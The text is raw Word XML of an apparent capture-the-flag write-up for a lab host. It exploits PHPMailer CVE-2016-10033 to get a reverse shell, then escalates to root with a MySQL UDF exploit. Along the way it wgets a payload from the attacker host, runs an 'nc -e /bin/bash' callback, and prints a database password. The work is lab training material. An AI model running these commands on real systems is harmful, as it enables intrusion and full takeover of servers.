        <w:t>dirb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hyperlink r:id="rId25" w:history="1">
        <w:r w:rsidRPr="009F3C08">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          </w:rPr>
          <w:t>http://192.168.1.115</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="48DE0CD6" w14:textId="063CFCC8" w:rsidR="008F3FD5" w:rsidRDefault="008F3FD5" w:rsidP="008F3FD5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Looked in /vendor/PATH</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CBA4B76" w14:textId="77777777" w:rsidR="008F3FD5" w:rsidRPr="00423CF8" w:rsidRDefault="008F3FD5" w:rsidP="008F3FD5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</w:p>
    <w:p w14:paraId="36D8DC9D" w14:textId="0C313382" w:rsidR="00423CF8" w:rsidRDefault="00423CF8" w:rsidP="00423CF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Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>flag2.txt</w:t>
      </w:r>
      <w:r w:rsidRPr="00423CF8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5691B70D" w14:textId="37A18D3C" w:rsidR="00F60ED9" w:rsidRPr="00423CF8" w:rsidRDefault="00F60ED9" w:rsidP="00F60ED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  <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4BB40BC4" wp14:editId="5534374B">
            <wp:extent cx="3743325" cy="1666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495A" w14:textId="77777777" w:rsidR="00423CF8" w:rsidRPr="00423CF8" w:rsidRDefault="00423CF8" w:rsidP="00423CF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23CF8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Exploit Used</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BCEE520" w14:textId="6C0ACF35" w:rsidR="00423CF8" w:rsidRDefault="00F60ED9" w:rsidP="00423CF8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PHP Mailer </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>ver</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> 5.2.16 per the /vendor/VERSION page</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F710553" w14:textId="228AAD4A" w:rsidR="00F60ED9" w:rsidRDefault="00F60ED9" w:rsidP="00F60ED9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Used </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>PHPMailerExploit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> v1.0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D26B75D" w14:textId="58AF4825" w:rsidR="00F60ED9" w:rsidRPr="00423CF8" w:rsidRDefault="00F60ED9" w:rsidP="00F60ED9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CVE 2016-10033</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E2D5C4E" w14:textId="6E2CCD95" w:rsidR="007F3DA0" w:rsidRDefault="00F60ED9" w:rsidP="00423CF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</w:p>
    <w:p w14:paraId="47D7CC48" w14:textId="76A962C2" w:rsidR="00F60ED9" w:rsidRDefault="00F60ED9" w:rsidP="00423CF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 xml:space="preserve">$ </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>searchsploit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phpmailer</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="5B3EA93B" w14:textId="249DF9A6" w:rsidR="00F60ED9" w:rsidRDefault="00F60ED9" w:rsidP="00423CF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Config the exploit to attack 192.168.1.115/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>contact.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> and will open a shell to port 443</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B7F234E" w14:textId="57F957F5" w:rsidR="00F60ED9" w:rsidRDefault="00F60ED9" w:rsidP="00423CF8">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00F646BE">
        <w:t>Saved exploit to ‘exploits’ folder in /root/Documents/exploits</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46C4B040" w14:textId="5C0E1007" w:rsidR="003D17AA" w:rsidRDefault="00F646BE" w:rsidP="00423CF8">
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">$ python </w:t>
      </w:r>
      <w:r w:rsidR="003D17AA">
        <w:t>40974.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4605DBA0" w14:textId="4CA0689E" w:rsidR="003D17AA" w:rsidRDefault="003D17AA" w:rsidP="00423CF8">
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">On a new terminal: set </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>NetCat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> to listen to 443 for the shell callback once the exploit loads</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0710653B" w14:textId="40DA5981" w:rsidR="003D17AA" w:rsidRDefault="003D17AA" w:rsidP="00423CF8">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">$ </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>nc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>lvnp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> 443</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13A8771E" w14:textId="2467602F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</w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>Visit 192.168.1.115/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>shell.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> page to trigger the </w:t>
      </w:r>
      <w:r w:rsidR="00506DCA">
        <w:t>backdoor</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51454005" w14:textId="4E4C0965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lastRenderedPageBreak/>
        <w:t xml:space="preserve">               </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2437EA86" wp14:editId="102CD805">
            <wp:extent cx="518160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71C2" w14:textId="77777777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</w:r>
    </w:p>
    <w:p w14:paraId="56113B16" w14:textId="60342BCE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>In the backdoor shell</w:t>
      </w:r>
      <w:r w:rsidR="000A609F">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6054BB88" w14:textId="7F74A9C3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  <w:t>$ python -c ‘import pty;pty.spawn(“/bin/bash”)’</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39A187DD" w14:textId="2BBD3319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  <w:t>$ cd /var/www</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="145E17D5" w14:textId="58A26222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  <w:t>$ cat flag2.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="689B8A8A" w14:textId="321EC852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</w:p>
    <w:p w14:paraId="61F7B2C0" w14:textId="6033EE9E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bookmarkStart w:id="2" w:name="_Hlk45785506"/>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>EXTRA 1: Flag 3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BC38DE4" w14:textId="1054FF6B" w:rsidR="000A609F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</w:r>
      <w:r w:rsidR="000A609F">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>In backdoor shell:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43560987" w14:textId="08272146" w:rsidR="003D17AA" w:rsidRDefault="000A609F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</w:r>
      <w:r w:rsidR="003D17AA">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>$ find . -type f -name ‘flag [3-4].*’</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56BCAE27" w14:textId="61042B88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  <w:t>/var/www/html/wordpress/wp-content/uploads/2018/11/flag3.png</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7806EC13" w14:textId="0E4AC16C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  <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:tab/>
        <w:t>Visit</w:t>
      </w:r>
      <w:r w:rsidRPr="003D17AA">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId28" w:history="1">
        <w:r w:rsidRPr="009F3C08">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>http://192.168.1.115/wordpress/wp-content/uploads/2018/11/flag3.png</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="5E2E95E4" w14:textId="64EB0D45" w:rsidR="003D17AA" w:rsidRDefault="003D17AA" w:rsidP="003D17A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15"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="28690362" wp14:editId="6DE86F2E">
            <wp:extent cx="5035603" cy="2535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512" cy="25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3E14" w14:textId="08FE2629" w:rsidR="003D17AA" w:rsidRDefault="003D17AA" w:rsidP="00423CF8">
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="190A9C7C" w14:textId="4721ED41" w:rsidR="003D17AA" w:rsidRDefault="003D17AA" w:rsidP="00423CF8"/>
    <w:p w14:paraId="7B97B6E5" w14:textId="50BC43DE" w:rsidR="003D17AA" w:rsidRDefault="003D17AA" w:rsidP="00423CF8">
      <w:r>
        <w:t>EXTRA 2:  Flag 4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61847436" w14:textId="3C4BEC3B" w:rsidR="003D17AA" w:rsidRDefault="000A609F" w:rsidP="00423CF8">
      <w:r>
        <w:t>In backdoor shell t</w:t>
      </w:r>
      <w:r w:rsidR="003D17AA">
        <w:t>o enumerate MySQL version:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="367DCAA1" w14:textId="390DBADA" w:rsidR="003D17AA" w:rsidRDefault="003D17AA" w:rsidP="00423CF8">
      <w:r>
        <w:t xml:space="preserve">$ /var/ $ </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>dpkg</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -l | grep </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>mysql</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EC61B87" w14:textId="711AFE2E" w:rsidR="003D17AA" w:rsidRDefault="003D17AA" w:rsidP="00423CF8"/>
    <w:p w14:paraId="20588305" w14:textId="77777777" w:rsidR="003D17AA" w:rsidRDefault="003D17AA" w:rsidP="003D17AA">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>Ver 5.5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D23B000" w14:textId="77777777" w:rsidR="000A609F" w:rsidRDefault="000A609F" w:rsidP="003D17AA">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve">In attacking system:  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EA7160D" w14:textId="6D23CA70" w:rsidR="003D17AA" w:rsidRDefault="000A609F" w:rsidP="003D17AA">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="003D17AA">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>Searchsploit for UDF privilege escalation 1518.c</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B05FC9D" w14:textId="111A0DBF" w:rsidR="003D17AA" w:rsidRDefault="000A609F" w:rsidP="003D17AA">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="003D17AA">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>Moved that exploit to my exploits folder…</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7719F4FB" w14:textId="77777777" w:rsidR="00C038E0" w:rsidRDefault="003D17AA" w:rsidP="003D17AA">
      <w:pPr>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve">Compiled the code </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FB8F1AB" w14:textId="1B7A94A3" w:rsidR="003D17AA" w:rsidRDefault="000A609F" w:rsidP="003D17AA">
      <w:pPr>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="003D17AA">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>$</w:t>
      </w:r>
      <w:r w:rsidR="005A0C89">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="003D17AA">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>gcc -shared -fpic -o 1518.so 1518.c</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="551C16D8" w14:textId="2F8E10F5" w:rsidR="003D17AA" w:rsidRDefault="000A609F" w:rsidP="003D17AA">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="003D17AA">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve">Hosted SimpleHTTPServer on port 8080 to upload to the Mysql tables in /tmp </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="456A5D8B" w14:textId="48A4FB65" w:rsidR="00C038E0" w:rsidRDefault="00C038E0" w:rsidP="003D17AA">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="000A609F">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>$</w:t>
      </w:r>
      <w:r w:rsidR="005A0C89">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>python -m SimpleHTTPServer 8080</w:t>
      </w:r>
      <w:r w:rsidR="005A0C89">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E127519" w14:textId="3F12B5FD" w:rsidR="000A609F" w:rsidRDefault="000A609F" w:rsidP="003D17AA">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>In backdoor shell:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29438D96" w14:textId="346D15A8" w:rsidR="005A0C89" w:rsidRDefault="005A0C89" w:rsidP="003D17AA">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:tab/>
        <w:t>$</w:t>
      </w:r>
      <w:r w:rsidR="000A609F">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve"> cd</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve"> /tmp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31A541A0" w14:textId="5B0A0DA5" w:rsidR="003D17AA" w:rsidRDefault="003D17AA" w:rsidP="003D17AA">
      <w:pPr>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>$</w:t>
      </w:r>
      <w:r w:rsidR="005A0C89">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>wget 192.168.1.90/1518.so</w:t>
      </w:r>
      <w:r w:rsidR="005A0C89">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63680D26" w14:textId="382FC3E2" w:rsidR="003D17AA" w:rsidRDefault="000A609F" w:rsidP="003D17AA">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">In the shell </w:t>
      </w:r>
      <w:r w:rsidR="003D17AA">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>log</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve"> i</w:t>
      </w:r>
      <w:r w:rsidR="003D17AA">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve">nto the Mysql </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>server:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BD352D8" w14:textId="2BBA6030" w:rsidR="003D17AA" w:rsidRDefault="003D17AA" w:rsidP="003D17AA">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:tab/>
        <w:t>$</w:t>
      </w:r>
      <w:r w:rsidR="005A0C89">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve">mysql -u root -p </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="651DF964" w14:textId="77777777" w:rsidR="003D17AA" w:rsidRDefault="003D17AA" w:rsidP="003D17AA">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:tab/>
        <w:t>P: R@v3nSecurity</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49F551C3" w14:textId="7C4D24C9" w:rsidR="003D17AA" w:rsidRDefault="000A609F" w:rsidP="003D17AA">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="003D17AA">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>In Mysql</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="634E76E9" w14:textId="36891DB8" w:rsidR="003D17AA" w:rsidRDefault="003D17AA" w:rsidP="003D17AA">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="000A609F">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>$ Create table foo(line blob);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5434B703" w14:textId="4545E87F" w:rsidR="003D17AA" w:rsidRDefault="003D17AA" w:rsidP="003D17AA">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="000A609F">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>$ Insert into foo values(load_file(‘tmp/1518.so’));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="055DDD4A" w14:textId="25F52302" w:rsidR="003D17AA" w:rsidRDefault="003D17AA" w:rsidP="003D17AA">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="000A609F">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>$ Select * from foo into dumpfile ‘/usr/lib/mysql/plugin/1518.so’;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CFF0246" w14:textId="484CD985" w:rsidR="003D17AA" w:rsidRDefault="003D17AA" w:rsidP="003D17AA">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="000A609F">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>$ Mysql create function do_system returns integer soname ‘1518.so’;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E071F94" w14:textId="47419C55" w:rsidR="003D17AA" w:rsidRDefault="003D17AA" w:rsidP="003D17AA">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="000A609F">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>$ Select do_system(‘nc -ncv 192.168.1.90 4321 -e /bin/bash’);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52535D30" w14:textId="77777777" w:rsidR="003D17AA" w:rsidRDefault="003D17AA" w:rsidP="003D17AA">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>On attacking system:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="632ACDE8" w14:textId="6857C20E" w:rsidR="003D17AA" w:rsidRDefault="003D17AA" w:rsidP="003D17AA">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:tab/>
        <w:t>$ Nc -lvp 4321 to open shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C2A2474" w14:textId="41EB0DDE" w:rsidR="003D17AA" w:rsidRDefault="003D17AA" w:rsidP="003D17AA">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>$ Whoami</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77C57AE9" w14:textId="77777777" w:rsidR="003D17AA" w:rsidRDefault="003D17AA" w:rsidP="003D17AA">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:tab/>
        <w:t>Root</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E0937C0" w14:textId="4DF3E52E" w:rsidR="003D17AA" w:rsidRDefault="003D17AA" w:rsidP="003D17AA">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>$ Cd /root</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72ACAB5F" w14:textId="77777777" w:rsidR="003D17AA" w:rsidRDefault="003D17AA" w:rsidP="003D17AA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>Ls</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="653747A2" w14:textId="77777777" w:rsidR="003D17AA" w:rsidRDefault="003D17AA" w:rsidP="003D17AA">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:tab/>
        <w:t>flag4.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14C3EFE4" w14:textId="3C1A2697" w:rsidR="003D17AA" w:rsidRDefault="003D17AA" w:rsidP="003D17AA">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>$ cat flag4.txt</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="2"/>
    <w:p w14:paraId="52473909" w14:textId="1163E15E" w:rsidR="003D17AA" w:rsidRDefault="003D17AA" w:rsidP="003D17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C9977C" wp14:editId="33C53CB3">
            <wp:extent cx="5505450" cy="5400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1962" w14:textId="77777777" w:rsidR="003D17AA" w:rsidRPr="00423CF8" w:rsidRDefault="003D17AA" w:rsidP="00423CF8"/>
    <w:sectPr w:rsidR="003D17AA" w:rsidRPr="00423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7D6197"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="3E1E9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5B216A"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="14068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D52E83"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="09266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E75C1F"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="956C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856C4B"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="1E40D1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183762"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="F746D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FF484E"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="42C2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75B67"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="6A46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F5660B"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="ED5C6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CF8"/>
    <w:rsid w:val="000A609F"/>
    <w:rsid w:val="00136B3E"/>
    <w:rsid w:val="00214C8C"/>
    <w:rsid w:val="0026627B"/>
    <w:rsid w:val="00353002"/>
    <w:rsid w:val="003B6143"/>
    <w:rsid w:val="003D17AA"/>
    <w:rsid w:val="00423CF8"/>
